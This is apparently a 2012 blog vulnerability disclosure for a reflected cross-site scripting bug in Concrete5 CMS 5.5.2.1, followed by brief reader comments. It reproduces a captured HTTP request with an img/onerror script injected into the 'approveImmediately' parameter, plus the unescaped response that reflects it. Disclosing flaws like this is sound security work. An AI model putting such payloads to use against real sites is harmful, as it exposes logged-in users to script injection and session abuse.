Thursday 26 April 2012
[EN] Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ TITLE ....... ][ Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://concrete5.org
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross-site scripting.
[--------------------------------------------[
[ 3. Where is bug :)
Below I present You some traffic from Burp Proxy:
...[cut from Burp]...
GET /concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?
approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata HTTP/1.1
Host: localhost
(...)
X-Requested-With: XMLHttpRequest
Cookie: CONCRETE5=...
...[end of cut]...
So vulnerable parameter is "approveImmediately", check it out:
...[answer (response) from Burp]...
(...)
<form method="post" name="permissionForm" id="ccmMetadataForm" action="http://localhost/concrete5.5.2.1/index.php?cID=102&ccm_token=...:...">
<input type="hidden" name="approveImmediately" value=""><img src=x onerror=alert(123123123)>" />
(...)
...[end of response]...
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[
Subscribe to:
Post Comments (Atom)
Hey...concreet5 is a very good cms...i am very happy working on it
ReplyDeleteYes me too. Working with this CMS was a very good lesson for me. ;)
DeleteThanks for comments ;)
If You have more questions, feel free to ask my via e-mail.
Enjoy o/
This comment has been removed by the author.
ReplyDelete